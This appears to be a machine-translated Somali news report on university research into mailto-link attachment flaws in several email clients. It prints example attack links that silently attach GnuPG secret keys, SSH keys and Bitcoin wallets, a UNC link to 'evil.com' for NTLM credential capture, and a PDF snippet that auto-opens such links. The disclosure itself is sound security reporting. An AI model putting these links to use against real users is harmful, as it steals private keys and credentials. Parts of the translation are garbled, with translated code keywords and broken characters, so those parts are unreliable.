Cilmi-baarayaal ka socda Jaamacadda Ruhr Bochum (Jarmalka)
Xiriirinta "
Macaamiisha boostada Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) iyo Pegasus Mail waxay u nugul yihiin weerar fudud oo kuu oggolaanaya inaad si toos ah ugu dhejiso fayl kasta oo maxalli ah, oo lagu qeexay isku xirka sida "mailto:? lifaaq=path_to_file". Faylka wuxuu ku lifaaqan yahay iyada oo aan muujin digniin, markaa iyada oo aan fiiro gaar ah lahayn, isticmaaluhu ma ogaan karo in warqadda lagu soo diri doono lifaaq.
Tusaale ahaan, adigoo isticmaalaya xiriiriye sida "mailto:[emailka waa la ilaaliyay]&subject=Title&body=Qoraalka&ku lifaaq=~/.gnupg/secring.gpg" waxaad gali kartaa furayaasha gaarka ah ee GnuPG xarafka. Waxaad sidoo kale diri kartaa waxa ku jira boorsooyinka crypto (~/.bitcoin/wallet.dat), furayaasha SSH (~/.ssh/id_rsa) iyo fayl kasta oo uu heli karo isticmaaluhu. Intaa waxaa dheer, Thunderbird waxay kuu ogolaaneysaa inaad ku dhejiso kooxo faylal ah adigoo isticmaalaya maaskaro adoo isticmaalaya dhismooyinka sida " lifaaq = / tmp / * .txt".
Marka laga soo tago faylalka maxalliga ah, macaamiisha iimaylka qaarkood waxay habeeyaan isku xirka kaydinta shabakadda iyo waddooyinka serfarka IMAP. Gaar ahaan, Xusuus-qorka IBM wuxuu kuu oggolaanayaa inaad ka wareejiso faylka tusaha shabakadda marka la shaqeynayo isku-xireyaasha sida " lifaaq = \ evil.com \ dummyfile ", iyo sidoo kale faragelinta cabbirrada xaqiijinta NTLM adoo u diraya isku xirka server-ka SMB ee uu gacanta ku hayo weerarka. (codsiga waxaa lagu soo diri doonaa isticmaalayaasha cabbiraadaha xaqiijinta ee hadda).
Thunderbird waxay si guul leh u socodsiisaa codsiyada sida " lifaaq = imap:///fetch>UID>/INBOX>1/", kaas oo kuu ogolaanaya inaad ku soo lifaaqdo macluumaadka faylalka IMAP. Isla mar ahaantaana, fariimaha laga soo helay IMAP, oo lagu sireeyay OpenPGP iyo S/MIME, ayaa si toos ah u furfuraya macmiilka boostada ka hor inta aan la dirin. Horumarinta Thunderbird waxay ahaayeen
Noocyadii hore ee Thunderbird ayaa sidoo kale u nugul laba nooc oo kale oo weerar ah oo ku saabsan PGP iyo S/MIME oo ay soo jeediyeen cilmi-baarayaashu. Gaar ahaan, Thunderbird, iyo sidoo kale OutLook, PostBox, eM Client, MailMate iyo R2Mail2, ayaa lagu soo rogay weerar beddelaad muhiim ah, oo ay sababtay xaqiiqda ah in macmiilka boostada uu si toos ah u soo dejiyo oo u rakibo shahaadooyin cusub oo lagu gudbiyo fariimaha S/MIME, taas oo u ogolaanaysa Weeraryahanku si uu u abaabulo beddelka furayaasha dadweynaha ee uu hore u kaydiyay isticmaaluhu.
Weerarka labaad, kaas oo Thunderbird, PostBox iyo MailMate ay u nugul yihiin, waxay wax ka beddelaan sifooyinka habka loogu talagalay kaydinta farriimaha qabyada ah waxayna u oggolaanaysaa, iyada oo la adeegsanayo cabbirrada mailto, si ay u bilawdo fur-furan farriimaha sirta ah ama ku darida saxiixa dhijitaalka ah ee farriimaha aan sharciga ahayn, oo leh gudbinta ku xigta ee natiijada loo gudbinayo serverka IMAP ee soo weeraray. Weerarkan, ciphertext-ku waxa lagu kala qaadaa xadka βjidhkaβ, iyo sumadda βmeta refreshβ waxa loo isticmaalaa in lagu bilaabo wicitaanka server-ka IMAP ee weerarka. Tusaale ahaan: ' '
Si otomaatig ah loogu habeeyo isku xirka "mailto:" iyada oo aan la isticmaalin isticmaale, dukumeenti PDF si gaar ah loo qaabeeyey ayaa la isticmaali karaa - ficilka OpenAction ee PDF wuxuu kuu ogolaanayaa inaad si toos ah u bilowdo maamulaha mailto markaad furayso dukumeenti:
%PDF-1.5
1 obj
<< /Nooca /Catalog /OpenAction [2 0 R] >>
endobj
2 obj
<< /Nooca /Action /S /URI/URI (mailto:?body=ββBilow FARIINTA PGPββ[β¦])>>
endobj
Source: opennet.ru